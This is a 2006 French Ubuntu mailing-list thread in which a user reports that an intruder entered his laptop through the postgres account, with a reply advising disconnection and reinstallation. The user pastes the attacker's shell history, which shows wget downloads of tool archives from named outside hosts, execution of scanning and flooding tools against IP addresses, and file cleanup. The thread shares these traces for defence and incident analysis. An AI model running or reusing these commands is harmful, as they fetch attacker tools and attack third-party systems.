Re: Sécurité Compromise dans UBUNTU dapper???

Free Mind fr33mind at gmail.com
Lun 27 Mar 19:23:37 UTC 2006 

Ma machine c'est mon portable perso qui me sert pour toutes sortes de
tests.  Je sais pour la dapper en production... mais j'aime bien avoir les
dernières version des logiciels aussi.

J'ai un router et pour le moment j'ai bloqué toutes les redirections de port
qui menaient à ma machine et j'ai bloqué pour que ssh n'accèpte que mon user
à moi.  Chose étrange, d'habitude c'est la première chose que je fais... et
j'ai oublié cette fois!

Mon erreur... je crois... c'est que j'ai installé le serveur postgres
8.1pour faire du dev localement il y a 2 jours.  Le hacker, s'est
loggé
justement avec le user postgres simplement.  (Y A UN MOT DE PASSE SUR LA
CONSOLE POUR POSTGRES PAR DEFAUT???????).

Et... j'ai la chance d'avoir son .bash_history.  Je le recopie plus bas...
Si vous voyez quelque chose... dîtes-le moi svp.  Je me foues un peu de le
publier car je crois que cela va beaucoup plus aider les gens ici à BLOQUER
ce genre de choses plutôt que de gens à hacker...

J'ai vu les wget et j'ai averti les "abuse" des serveurs qui héberge ça...
ainsi que les propriétaires des IP via le whois de où il envoie certaines
données.  Si jamais les fichiers ne sont plus sur les serveurs du
bash_history, j'ai fait un wget à nouveau pour les sauvegarder ici pour les
examiner.

Moi de ce que je vois, c'est qu'il a rien pris de ma machine du tout.  Il
s'apprêtait seulement à installer des choses pour aller attaquer une autre
cible totalement.  Il n'a pas semblé s'intéressé à aucun de mes fichiers.
Il semblait scanner des ports et scanner pour passer root.

J'ai aussi l'impression qu'il y avait 2 personnes en même temps sur ma
machine.

J'ai aussi l'impression que je les ai arrêté assez rapidement dans leur
démarche.

J'ai vérifié mes auth.log, le bash_history, le /etc/passwd, le ps aux
J'ai changé le password de postgres...

J'ai passé ces 2 outils et tout est ok je pense:

$ apt-cache search rootkit
chkrootkit - Checks for signs of rootkits on the local system
rkhunter - rootkit, backdoor, sniffer and exploit scanner

Le seul fichier que j'ai changé après l'installation de postgres était:
# TYPE  DATABASE    USER        CIDR-ADDRESS          METHOD

# "local" is for Unix domain socket connections only
local   all         all                               ident sameuser
# IPv4 local connections:
host    all         postgres    127.0.0.1/32          trust
host    all         all         127.0.0.1/32          md5
# IPv6 local connections:
host    all         all         ::1/128               md5

J'avais fait les coins ronds car ce n'était qu'un test... je n'avais plus de
temps et j'y serais revenu plus tard. Je voulais simplement voir si ça
marchait avec pgadmin3. J'avais encore rien mis dedans.  Mais je pense pas
que ce fichier change quelque chose...


Le fichier .bash_history de postgres:
(et j'ai vérifié, c'est vraiment le début du fichier)

$ cat bash_history_attak
uptime
cat /proc/cpuinfo
uname -a
wget
passwd
cikalaka
passwd
uptime
tar
cd /var/tmp
ls
ls -all
rm -rf .mr004.tar.filepart
ping www.yahoo.com
wget
wget http://rooot.xhost.ro/fld.tgz
tar zxvf fld.tgz
rm -rf fld.tgz
cd .fl
./x 200.68.192.253 53 0
cd /var/tmp
ls -all
rm -rf .fl
uptime
ls -all
cat /proc/cpuinfo
wget
wget http://mundd.net/xxl.tgz
tar zxvf xxl.tgz
rm -rf xxl.tgz
cd .mr004
./start 193.2
./start 193.41
./start 83.103
ftp
screen
ls -all
tar zxvf shelp.tar
rm -rf shelp.tar
mv start a
./shelp 81
./shelp 83
ls -all
rm -rf 81.0.pscan.22
rm -rf 83.0.pscan.22
./shelp 83






On 3/27/06, Patrice Karatchentzeff <patrice.karatchentzeff at gmail.com> wrote:
>
> Le 27/03/06, Free Mind<fr33mind at gmail.com> a écrit :
> > J'ai vraiment la confirmation qu'un intrus est entré... J'ai postgresql
> 8.1
> > d'installé via apt-get seulement depuis hier... et hop, j'ai un
> > .bash_history avec la liste des commandes et des fichiers qu'il a déposé
> > dans /var/tmp/.mr004
> >
> > Comment a-t-il fait pour entrer en console avec le user postgres?  Je
> n'ai
> > encore presque rien changé dans les config de postgres.  Quel est le mot
> de
> > passe par défaut à l'install et comment ce fait-il que c'est possible de
> > loguer avec ce user??????
> >
> > J'ai bloqué pour permettre que mon usager d'entrer dans SSH en tous les
> cas.
>
> Ce n'est pas suffisant. SI le gars est balèze, il a très bien pu
> prévoir aussi le coup...
>
> Il faut déconnecter *totalement* la machine du réseau.
>
> Ensuite, il faut être très méticuleux pour chasser l'intrus. Si tu ne
> te sens pas assez fort - c'est loin d'être trivial - le mieux est
> encore de réinstaller entièrement la machine. Y compris les données
> (AVANT l'attaque).
>
> Toutefois, vues les traces laissées, l'attaquant n'a pas l'air d'être
> très balèze... tout dépend de toi en fait.
>
> Remarque importante : une machine de prod en unstable (puisque c'est
> une Dapper) n'est PAS une bonne sauf si l'on maîtrise PARFAITEMENT son
> sujet (et donc que l'on est capable d'assurer soi-même la sécurité de
> sa machine, ce qui ne semble pas être ton cas).
>
> Bref, chat échaudé...
>
>
-------------- section suivante --------------
Une pièce jointe HTML a été nettoyée...
URL: <https://lists.ubuntu.com/archives/ubuntu-fr/attachments/20060327/7e76fb5d/attachment.html>

Plus d'informations sur la liste de diffusion ubuntu-fr